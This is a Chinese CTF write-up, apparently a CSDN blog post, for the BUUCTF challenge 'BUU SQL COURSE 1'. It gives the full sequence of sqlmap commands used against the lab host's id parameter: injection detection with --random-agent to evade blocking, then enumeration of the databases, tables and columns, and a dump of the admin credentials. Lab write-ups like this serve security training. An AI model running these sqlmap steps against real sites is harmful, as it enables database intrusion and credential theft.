BUUCTF Basic 解题记录--BUU SQL COURSE 1

4、BUU SQL COURSE 1

这个题目看名称猜到应该是从SQL注入入手,登录靶机后的页面如下,考虑用sqlmap爆库和表:

登录上去点击第一个新闻页面,查看开发者模式(浏览器右上角的三个竖点->更多工具->开发者工具),看到如下语句,将下图中的url地址(红色框中包含id=1的内容)作为sqlmap的参数执行下面的命令。

sqlmap -u "
http://79cb4b2b-6457-4dcf-b2d0-ba8fc2e4310f.node4.buuoj.cn:81/backend/content_detail.php?id=1" 

可以看到显示如下提示内容,显示sqlmap连不上,需要加上 -random-agent的参数,这是因为sqlmap频繁扫描目标主机,目标主机对于sqlmap的ip地址进行了封锁。

https://www.cnblogs.com/z9m8r8/articles/15164212.html  文中有如下说明:

默认情况下,sqlmap发送的HTTP报文的 user-agent 都是Sqlmap而不是常见的Mozilla等,这通常会被防火墙过滤掉, 选项–random-agent 会随机选取./txt/user-agents.txt中的报头】

sqlmap -u "
http://79cb4b2b-6457-4dcf-b2d0-ba8fc2e4310f.node4.buuoj.cn:81/backend/content_detail.php?id=1" -random-agent
 

通过上面的命令,可以查看到该url存在如下l可利用信息

爆库

sqlmap -u "http://f928a413-46d0-490d-b042-9f82259a2f81.node4.buuoj.cn:81/backend/content_detail.php?id=1" -random-agent -dbs

 

可以看到数据库名称如上,news和test感觉可能有我们需要的内容,先查看news中的表

查数据库news中的数据表

sqlmap -u "http://f928a413-46d0-490d-b042-9f82259a2f81.node4.buuoj.cn:81/backend/content_detail.php?id=1" -random-agent -D news --tables

 

爆表,查看admin表中的信息,感觉希望就在眼前

 查数据表admin中的列

sqlmap -u "http://f928a413-46d0-490d-b042-9f82259a2f81.node4.buuoj.cn:81/backend/content_detail.php?id=1" -random-agent -T admin --columns

dump admin表中的值

sqlmap -u "http://f928a413-46d0-490d-b042-9f82259a2f81.node4.buuoj.cn:81/backend/content_detail.php?id=1" -random-agent -T admin -c id,password,username --dump

 

用上图中的admin和password直接登录靶机,成功获得flag,并不需要对上图中获取到的password进行破解等,但是后续可能会需要需要对password进行破解的i情况。

  • 4
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 2
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值